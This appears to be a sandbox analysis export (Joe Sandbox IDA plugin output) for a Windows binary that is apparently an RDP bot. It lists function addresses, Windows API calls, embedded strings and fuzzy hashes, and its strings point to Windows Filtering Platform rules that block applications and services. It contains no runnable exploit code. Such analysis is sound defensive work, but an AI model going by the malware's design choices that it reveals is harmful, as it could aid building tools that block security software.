Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: DestroyEnumFwpmHandle0Providerwcscmp
String ID: [E] (%s) -> FwpmProviderAdd0 failed(res=%08lx)$[E] (%s) -> FwpmProviderCreateEnumHandle0 failed(res=%08lx)$[E] (%s) -> FwpmProviderEnum0 failed(res=%08lx)$setup_filt_prov
API String ID: 1522850966-2029202777
Opcode ID: 48a6589deb611d06c9edb1f8e6d9c58bc03904249b7b70e4a3387195757c5765
Instruction ID: aebe8440d3db3d690e685024f5933cc0d5cdb60d35cb16dd16adcc162a57bc3d
Opcode Fuzzy Hash: 48a6589deb611d06c9edb1f8e6d9c58bc03904249b7b70e4a3387195757c5765
Instruction Fuzzy Hash: 8E518431A1CB81C5FB618B1AE5403AA72B6FB59784F004135EA8D8BB99EF3DD444CB84

Function 00007FF66EBA9621 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 89COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF66EBA76D0: wcscmp.MSVCRT ref: 00007FF66EBA786D

FwpmEngineClose0.FWPUCLNT(?,?,?,?,?,?,00000000,00000239A82514D0,?,00007FF66EBA14B4,?,?,00000001,00007FF66EBA14D2), ref: 00007FF66EBA9701

Strings

svc, xrefs: 00007FF66EBA9728
app, xrefs: 00007FF66EBA96E0
wfp_block, xrefs: 00007FF66EBA96B3
[E] (%s) -> FwpmuserOpen0 failed(res=%08lx), xrefs: 00007FF66EBA96BA
ip4, xrefs: 00007FF66EBA967A

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: Close0EngineFwpmwcscmp
String ID: [E] (%s) -> FwpmuserOpen0 failed(res=%08lx)$app$ip4$svc$wfp_block
API String ID: 4239307310-774261742
Opcode ID: a834c224ed3b308d03cf7a33da323f19570100c4512a2beaecdd82d4379bef9a
Instruction ID: 05b9526febad11aecd7da8be6e194f7f6e0e5ac276b89001b77c01e51b603ff2
Opcode Fuzzy Hash: a834c224ed3b308d03cf7a33da323f19570100c4512a2beaecdd82d4379bef9a
Instruction Fuzzy Hash: 35318E51B5C643C2FF509AADB6902BA12B1DF6E3C0F500031FA0ECF696EE5DD845A348

Function 00007FF66EBA6497 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 00007FF66EBA64A0
GetLastError.KERNEL32 ref: 00007FF66EBA64E5

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA64D2
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF66EBA64BD
fs_path_exists, xrefs: 00007FF66EBA64CB
(path != NULL), xrefs: 00007FF66EBA64C4

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
API String ID: 1799206407-4111913120
Opcode ID: 6288ba96a2c54b07fc6c23e9f4ae3678dc1dba26fb187c7b6411f3a55125536d
Instruction ID: 965fe8b647dfb2ff0895038e7a94c865ad0f37049b4432fd5f298f5f3facda19
Opcode Fuzzy Hash: 6288ba96a2c54b07fc6c23e9f4ae3678dc1dba26fb187c7b6411f3a55125536d
Instruction Fuzzy Hash: 7821D6E0EAC447C3FF20565C96843793560DF2A70AF208536F11ECE2ECDE5CE885524A

Function 00007FF66EBA1C73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF66EBA1C93

Part of subcall function 00007FF66EBA14E2: fwrite.MSVCRT ref: 00007FF66EBA158E
Part of subcall function 00007FF66EBA14E2: fflush.MSVCRT ref: 00007FF66EBA159A

GetLastError.KERNEL32 ref: 00007FF66EBA1CC6

Strings

module_get_proc, xrefs: 00007FF66EBA1CAC, 00007FF66EBA1CD6
[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FF66EBA1CDD
[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FF66EBA1CB3

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: e53e799cc88bc32a505467fc5252c664ac9aebec5248efd15ce05c3f62491525
Instruction ID: 75c9b7e231d80dd15e210c64efd2e260988ca29ad0c077c04bce7996699ec6c3
Opcode Fuzzy Hash: e53e799cc88bc32a505467fc5252c664ac9aebec5248efd15ce05c3f62491525
Instruction Fuzzy Hash: B9F0A990E48613D2FE518759BA805F55275BF2EBD0F584431FD4C8FBA4EE2CD9468308

Function 00007FF66EBA89E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

Process32Next.KERNEL32 ref: 00007FF66EBA8671
GetLastError.KERNEL32 ref: 00007FF66EBA867D
CloseHandle.KERNEL32 ref: 00007FF66EBA8A16

Strings

block_app, xrefs: 00007FF66EBA868D
[E] (%s) -> Process32Next failed(gle=%lu), xrefs: 00007FF66EBA8694

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: CloseErrorHandleLastNextProcess32
String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
API String ID: 1692733154-1215713629
Opcode ID: 666f7788e003c775c598e45232550bd81855b7980d96f8fff076b2734e9b3f84
Instruction ID: d0972ad5ab05a9ee36376c31544fe27b1100fb5e9e48105243a3e0f176dfb3fe
Opcode Fuzzy Hash: 666f7788e003c775c598e45232550bd81855b7980d96f8fff076b2734e9b3f84
Instruction Fuzzy Hash: 42F03751E48A43D6FE24675CEAD817812B1EF6F744F808032E40ECF6A5EE6CE944830D

Function 00007FF66EBA89D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

Process32Next.KERNEL32 ref: 00007FF66EBA8671
GetLastError.KERNEL32 ref: 00007FF66EBA867D
CloseHandle.KERNEL32 ref: 00007FF66EBA8A16

Strings

block_app, xrefs: 00007FF66EBA868D
[E] (%s) -> Process32Next failed(gle=%lu), xrefs: 00007FF66EBA8694

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: CloseErrorHandleLastNextProcess32
String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
API String ID: 1692733154-1215713629
Opcode ID: f7968e485989eb5247307d17b61265f3b96f0deac1df6c17409495cdd1f28a9b
Instruction ID: 579bbe12ae004132ccc705466e1160485dc9dbd42bfd6b1c819120a5353604f6
Opcode Fuzzy Hash: f7968e485989eb5247307d17b61265f3b96f0deac1df6c17409495cdd1f28a9b
Instruction Fuzzy Hash: 39F03751E48A43D6FE25675CEAD817812B5EF6F744F808032E40ECF6A5EE6CE944830D

Function 00007FF66EBA89E7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

Process32Next.KERNEL32 ref: 00007FF66EBA8671
GetLastError.KERNEL32 ref: 00007FF66EBA867D
CloseHandle.KERNEL32 ref: 00007FF66EBA8A16

Strings

block_app, xrefs: 00007FF66EBA868D
[E] (%s) -> Process32Next failed(gle=%lu), xrefs: 00007FF66EBA8694

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: CloseErrorHandleLastNextProcess32
String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
API String ID: 1692733154-1215713629
Opcode ID: d603581fc06708a95ad35b39a4fddb14ab4b4737cd2f820cbdeb3fc7c7cf88f9
Instruction ID: e46402650d8e36315a7b2cff964b9275737b2daf7f7c3b530a35de623fc0f5e4
Opcode Fuzzy Hash: d603581fc06708a95ad35b39a4fddb14ab4b4737cd2f820cbdeb3fc7c7cf88f9
Instruction Fuzzy Hash: FAF03751E48A43D6FE24675CEAC817812B1EF6F744F808032E40ECF6A5EE6CE944830D

Function 00007FF66EBA8A40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

Process32Next.KERNEL32 ref: 00007FF66EBA8671
GetLastError.KERNEL32 ref: 00007FF66EBA867D
CloseHandle.KERNEL32 ref: 00007FF66EBA8A16

Strings

block_app, xrefs: 00007FF66EBA868D
[E] (%s) -> Process32Next failed(gle=%lu), xrefs: 00007FF66EBA8694

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: CloseErrorHandleLastNextProcess32
String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
API String ID: 1692733154-1215713629
Opcode ID: 41b1c1eafcc7ebc97e913e8cca0af6e3351bd43c4327a88d1a55e02c619556bc
Instruction ID: 6ce400fdeca3a42da25d4c0e83c9500f7a15bfe6ae7282a9d627082f1397bf22
Opcode Fuzzy Hash: 41b1c1eafcc7ebc97e913e8cca0af6e3351bd43c4327a88d1a55e02c619556bc
Instruction Fuzzy Hash: 69F03751E48A43D6FE646B5CEAC817812B1EF6F744F808032E40ECE6A5EE2CE944830D

Function 00007FF66EBA1CF4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF66EBA1D02

Part of subcall function 00007FF66EBA14E2: fwrite.MSVCRT ref: 00007FF66EBA158E
Part of subcall function 00007FF66EBA14E2: fflush.MSVCRT ref: 00007FF66EBA159A

GetLastError.KERNEL32 ref: 00007FF66EBA1D2E

Strings

module_load, xrefs: 00007FF66EBA1D16, 00007FF66EBA1D3A
[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FF66EBA1D1D
[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FF66EBA1D41

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: dffd9c4dfdfa348c0933c47837ca62ed3df51fd0b9f0c726f591125bfae7f7ef
Instruction ID: 6a9aa77058fc1fae6f1b8db6fe339dc0d5263e561f0859aebbc046ad9fd9e530
Opcode Fuzzy Hash: dffd9c4dfdfa348c0933c47837ca62ed3df51fd0b9f0c726f591125bfae7f7ef
Instruction Fuzzy Hash: 8EF09060E49607D1FD90975EAAC04F012309F3F784F080031E94DAF760ED1CA549C304

Function 00007FF66EBA47BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF66EBA4B30

Strings

fs_file_read, xrefs: 00007FF66EBA4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA4B6C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 45454886e19af0f3a1d46188feaae8401dd09c0e9c6c59378aac8472f3ab07f3
Instruction ID: 124597de748472ad24060ff1b70a01ad1025f7f407483bf1de18b61c2d7c7367
Opcode Fuzzy Hash: 45454886e19af0f3a1d46188feaae8401dd09c0e9c6c59378aac8472f3ab07f3
Instruction Fuzzy Hash: 7FF05E13B48203C3FD529A09B6817B96261AFAA765E890535ED5C8F6D1EE3DA8878304

Function 00007FF66EBA47D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF66EBA4B30

Strings

fs_file_read, xrefs: 00007FF66EBA4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA4B6C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: e33692760d6982d61dafc9675408eb25253a5ea45f82db5d17f1cf7bcd550c10
Instruction ID: 1f846159e828160cd3cdc8d0a8ca913923ba2e82c14d2e6748f813c85ec08460
Opcode Fuzzy Hash: e33692760d6982d61dafc9675408eb25253a5ea45f82db5d17f1cf7bcd550c10
Instruction Fuzzy Hash: F4F05413B48203C3FD529A0976807B961615FAA765E890535ED5CCE6D1EE3D68878304

Function 00007FF66EBA47C6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF66EBA4B30

Strings

fs_file_read, xrefs: 00007FF66EBA4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA4B6C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: fc9ac18d2d3b85d97e220ba5648c8f5163264cc353de88d57e199d5ec4a0326b
Instruction ID: e7610c4f53ef4b956401f3525b0aa808724e35ad2750b4b5f3ad730550baf1fd
Opcode Fuzzy Hash: fc9ac18d2d3b85d97e220ba5648c8f5163264cc353de88d57e199d5ec4a0326b
Instruction Fuzzy Hash: 02F05E13F48203C3FD529A09B6807B96261AFAA765E890535ED5C8E6D1EE3DA8878304

Function 00007FF66EBA4785 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF66EBA4B30

Strings

fs_file_read, xrefs: 00007FF66EBA4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA4B6C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: e33692760d6982d61dafc9675408eb25253a5ea45f82db5d17f1cf7bcd550c10
Instruction ID: 1f846159e828160cd3cdc8d0a8ca913923ba2e82c14d2e6748f813c85ec08460
Opcode Fuzzy Hash: e33692760d6982d61dafc9675408eb25253a5ea45f82db5d17f1cf7bcd550c10
Instruction Fuzzy Hash: F4F05413B48203C3FD529A0976807B961615FAA765E890535ED5CCE6D1EE3D68878304

Function 00007FF66EBA477B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF66EBA4B30

Strings

fs_file_read, xrefs: 00007FF66EBA4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA4B6C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: fc9ac18d2d3b85d97e220ba5648c8f5163264cc353de88d57e199d5ec4a0326b
Instruction ID: e7610c4f53ef4b956401f3525b0aa808724e35ad2750b4b5f3ad730550baf1fd
Opcode Fuzzy Hash: fc9ac18d2d3b85d97e220ba5648c8f5163264cc353de88d57e199d5ec4a0326b
Instruction Fuzzy Hash: 02F05E13F48203C3FD529A09B6807B96261AFAA765E890535ED5C8E6D1EE3DA8878304

Function 00007FF66EBA4B8B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF66EBA4B30

Strings

fs_file_read, xrefs: 00007FF66EBA4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA4B6C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 3578e000deca6bf0f55c4be3ab5e47372c0efc907d12420e65de4e4252440305
Instruction ID: f86cd0f2d8c127f5c3dafb354d7f64b48461c37dfe2fa055fa25b3342361b0db
Opcode Fuzzy Hash: 3578e000deca6bf0f55c4be3ab5e47372c0efc907d12420e65de4e4252440305
Instruction Fuzzy Hash: C4F05413B48103C3FD529A0976807B961619FAA765E8D0535ED5C8F7D1EE3D69878304

Function 00007FF66EBA47B2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF66EBA4B30

Strings

fs_file_read, xrefs: 00007FF66EBA4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA4B6C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
